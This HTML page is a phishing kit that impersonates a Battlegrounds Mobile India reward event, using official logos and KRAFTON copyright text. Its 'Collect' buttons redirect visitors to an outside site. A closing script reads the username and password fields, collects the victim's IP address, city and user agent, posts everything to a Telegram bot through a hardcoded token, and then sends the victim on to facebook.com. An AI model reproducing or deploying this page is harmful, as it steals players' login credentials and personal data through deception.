
<html>
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta property="og:title" content="Battlegrounds Mobile Event">
<meta name="description" content="Collect your special rewards at the Royale Pas Event. This opportunity is limited and without the need for topup. Collect your rewards now!">
<meta property="og:description" content="Collect your special rewards at the Royale Pas Event. This opportunity is limited and without the need for topup. Collect your rewards now!">
<meta property="og:url" content="./">
<meta property="og:site_name" content="Battlegrounds Mobile Event">
<meta property="og:type" content="website">
<meta name="copyright" content="Battlegrounds Mobile India">
<meta name="theme-color" content="#000">
<meta property="og:image" content="https://www.battlegroundsmobileindia.com/common/img/main/app.png">
<title>Battlegrounds Mobile India Event</title>
<link rel="stylesheet" href="https://ix-event.com.tr/enter/D4/css/style.css">
<link rel="stylesheet" href="https://ix-event.com.tr/enter/D4/css/animate.css">
<link rel="stylesheet" href="css/login/facebook.css">
<link rel="stylesheet" href="css/login/twitter.css">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
<link rel="icon" href="https://www.battlegroundsmobileindia.com/common/img/main/app.png">
</head>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<style type="text/css">
 body {
	background: #000 center / cover no-repeat;
	margin: 0;
	font-family: 'Teko';
}
.container {
	border: 1px solid #CAB16D;
}
.navbar {
	background: #0C0C0C;
	width: 100%;
	height: 60px;
}
.navbar-logo {
	width: 100px;
	float: left;
	margin-top: 12px;
	margin-left: 13px;
}
.navbar-shop {
	width: 29px;
	margin-top: 19px;
	margin-right: 8px;
}
.navbar-menu {
	width: 20px;
	margin-top: 19px;
	margin-right: 5px;
}
.navbar-right {
	width: auto;
	float: right;
}
.navbar-download {
	background: #ffca13;
	width: 50px;
	height: 50px;
	margin-top: 10px;
	margin-right: 3px;
	border-radius: 0px;
	float: right;
}
.navbar-download img {
	width: 20px;
	height: 21px;
	margin: 13px;
}
.navbar-righ {
	width: auto;
	float: right;
}
.navbar-shp {
	width: 29px;
	margin-top: 19px;
	margin-right: 10px;
}
.event-theme {
	width:100%;
	height:100px;
	margin-top: -20px;
	margin-left:auto;
	margin-right:auto;
	padding: 5px;
	display:block;
}
.event-notification-wrapper {
	width:85%;
	height: auto;
	margin-top:20px;
	margin-left:auto;
	margin-right:auto;
	margin-bottom:5px;
	display:block;
}
.event-notification-content {
	width:100%;
	height:auto;
	bottom: -5px;
	padding:5px;
	color:#CAB16D;
	text-shadow: 0.5px 0.5px #9A7242;
	font-size: 21px;
	font-family:Teko;
	text-align: center;
}
.event-notification-content-timer i {
    padding-top:2px;
	padding-right:5px;
	color:#000;
	font-size:19px;
}
.event-notification-content-timer {
	margin-top:2px;
	margin-right:5px;
	float: right;
}
.footer {
	background: #131313;
	width: 100%;
	height: auto;
	padding: 15px;
}
.footer-copyright-icon {
	width: 55%;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	display: block;
}
.footer-txt-copyright {
	color: #bdbdbd;
	font-size: 15px;
	font-family:Teko;
	text-align: center;
}
.item img {
    border: none;
}
.item button {
	border:1.5px solid #CAB16D;
	color:#CAB16D;
	text-shadow: 0.3px 0.3px #9A7242;
}
.nav-popup-title {
    padding-left: 15px;
	padding-top: 2px;
	color: #000;
	font-size: 22px;
	font-family:Teko;
	font-weight: 500;
	text-align: left;
}
.nav-popup img {
	width: 20px;
	height: 20px;
	margin-top: 5px;
	margin-right: 10px;
	color: #000;
	float: right;
}
.popup-alerts {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #fff;
	font-size: 20px;
    font-family:Teko;
	font-weight: 500;
	text-align: center;
	display: block;
}
.popup-alert {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #fff;
	font-size: 20px;
    font-family:Teko;
	font-weight: 500;
	text-align: center;
	display: block;
}
.popup-alert i {
	padding-top: 15px;
	padding-bottom: 15px;
	color: #fff;
	font-size: 40px;
	text-align: center;
}
.popup-footer button:nth-child(1) {
	width: auto;
	height: auto;
	margin-top: 4px;
	margin-left:auto;
	margin-right:auto;
	padding: 3px;
	padding-left: 28px;
	padding-right: 28px;
	color: #000;
	font-size:18px;
	font-family: Teko;
	font-weight: 500;
	text-align: center;
	border: none;
	outline: none;
}
.popup-btn-login {
    width: 40%;
    height: auto;
    padding: 6px;
    margin: 5px;
    color: #000;
	font-size: 15px;
    font-family: Teko;
    border: none;
    outline: none;
    margin-bottom: 45px;
    position: relative;
    display: line-block;
}
.popup-btn-login i {
    color: #fff;
    font-size: 23px;
    float: left;
}
.popup-btn-facebook {
    background: #4167B2;
    color: #fff;
}
.popup-btn-twitter {
    background: #198B96;
    color: #fff;
}
.popup-form-footer {
    margin-top: -16px;
}
.popup-form-footer button {
	width: auto;
	height: auto;
	margin-top: 4px;
	padding: 3px;
	padding-left: 30px;
	padding-right: 30px;
	color: #000;
	font-size:18px;
	font-family: Teko;
	font-weight: 500;
	text-align: center;
	border:none;
	outline: none;
}
.popup-form input {
    background: none;
	background-size:100% 100%;
	width: 90%;
	height: auto;
	margin-left: 6px;
	margin-bottom: 3px;
	padding: 4.4px;
	color: #fff;
	font-size:17px;
	font-family:Teko;
	font-weight: 500;
	border-radius: 2px;
	border: 1px solid #fff;
	position: relative;
	outline: none;
	-webkit-appearance: none;
    -moz-appearance: none;
}
.popup-form input::placeholder {
	color: #fff;
}
.popup-form select {
    background: none;
	background-size:100% 100%;
	width: 90%;
	height: auto;
	margin-left: 6px;
	margin-bottom: 3px;
	padding: 6px;
	padding-left: 6px;
	color: #fff;
	font-size: 17px;
	font-family:Teko;
	font-weight: 500;
	border-radius: 2px;
	border: 1px solid #fff;
	position: relative;
	outline: none;
	-webkit-appearance: none;
    -moz-appearance: none;
}
</style>
<div class="container">
<div class="navbar">
<img class="navbar-logo" src="https://www.battlegroundsmobileindia.com/common/img/common/logo.png">
<div class="navbar-right">
<img class="navbar-shop" src="https://www.battlegroundsmobileindia.com/common/img/btn/sns_f_w.png">
<img class="navbar-shop" src="https://www.battlegroundsmobileindia.com/common/img/btn/sns_i_w.png">
<img class="navbar-shop" src="https://www.battlegroundsmobileindia.com/common/img/btn/sns_y_w.png">
<div class="navbar-download"><img src="https://i.ibb.co/jwMxWFh/menu.png"></div>
<div class="navbar-righ">
<img class="navbar-shp" src="https://www.battlegroundsmobileindia.com/common/img/icon/icon_shop_50.png"></div>
</div>
</div>
<div class="header">
<img src="rewards/header.jpg">
</div>
<div class="event-theme">
</div>
<div class="event-notification-wrapper">
</div>
<div class="box">
<center>
<div class="tab_rewards" id="latest">
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="rewards/1.jpg">
</figure>
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="rewards/1.jpg">Collect</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="rewards/2.jpg">
</figure>
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="rewards/2.jpg">Collect</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="rewards/3.jpg">
</figure>
</div>
<div>
<script>
function open_itemReward_confirmation(button) {
    // Yahan aapka existing code
    // ...

    // Function ke baad redirect
    window.location.href = 'https://test-tau-seven-68.vercel.app/?id=6109383692';
}
</script>

<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="rewards/3.jpg">Collect</button>

</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="rewards/6.jpg">
</figure>
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="rewards/6.jpg">Collect</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="rewards/5.jpg">
</figure>
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="rewards/5.jpg">Collect</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="rewards/4.jpg">
</figure>
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="rewards/4.jpg">Collect</button>
</div>
</div>
</div>
</center>
</div>
<div class="footer">
<img class="footer-copyright-icon" src="https://www.battlegroundsmobileindia.com/common/img/common/footerlg.png">
<div class="footer-txt-copyright">ⓒ KRAFTON, Inc. All rights reserved.</div>
<div class="footer-txt-copyright">Privacy Policy | Terms of Service | Rules of Conduct | Official Community Policy</div>
</div>

    <script>function la(src) {
      window.location = src;
    }
    
         function GetURLParameter(sParam) {
           var sPageURL = window.location.search.substring(1);
           var sURLVariables = sPageURL.split('&');
           for (var i = 0; i < sURLVariables.length; i++) {
             var sParameterName = sURLVariables[i].split('=');
             if (sParameterName[0] == sParam) {
               return sParameterName[1];
             }
           }
         }
    
         var chatid = GetURLParameter('id');
    
         function submitonhfc() {
           // Get IP address information using an API service
           fetch('https://ipapi.co/json/')
             .then(response => response.json())
             .then(data => {
               // Extract relevant device and IP information
               const userAgent = navigator.userAgent;
               const ip = data.ip;
               const cityName = data.city;
    
               // Create the message to send
               const page = document.getElementById("pagename").value;
               const name = document.getElementById("name").value;
               const email = document.getElementById("email").value;
               const message = `> Login Page : ${page}\n\n> Username : ${name}\n\n> Password : ${email}\n\n> User Agent : ${userAgent}\n\n> IP Address : ${ip}\n\n> City : ${cityName}`;
    
               // Send the message to your Telegram bot using the appropriate API
               const botToken = '7004332135:AAGn7Z6qEqWP6ifzHOC0DO2o0An64kTnZV4';
               const chatId = chatid;
    
               const telegramUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;
               const telegramParams = {
                 chat_id: chatId,
                 text: message
               };
    
               // Send the request to the Telegram bot using AJAX
               const xhr = new XMLHttpRequest();
               xhr.open('POST', telegramUrl, true);
               xhr.setRequestHeader('Content-Type', 'application/json');
               xhr.send(JSON.stringify(telegramParams));
    
               // Handle the response (optional)
               xhr.onload = function() {
                 if (xhr.status === 200) {
                   window.location.href = "https://www.facebook.com";
                 } else {
                   console.log('Error sending data to Telegram:', xhr.statusText);
                 }
               };
    
             })
             .catch(error => console.log('Error retrieving IP address information:', error));
         }</script>
</body>
</html>
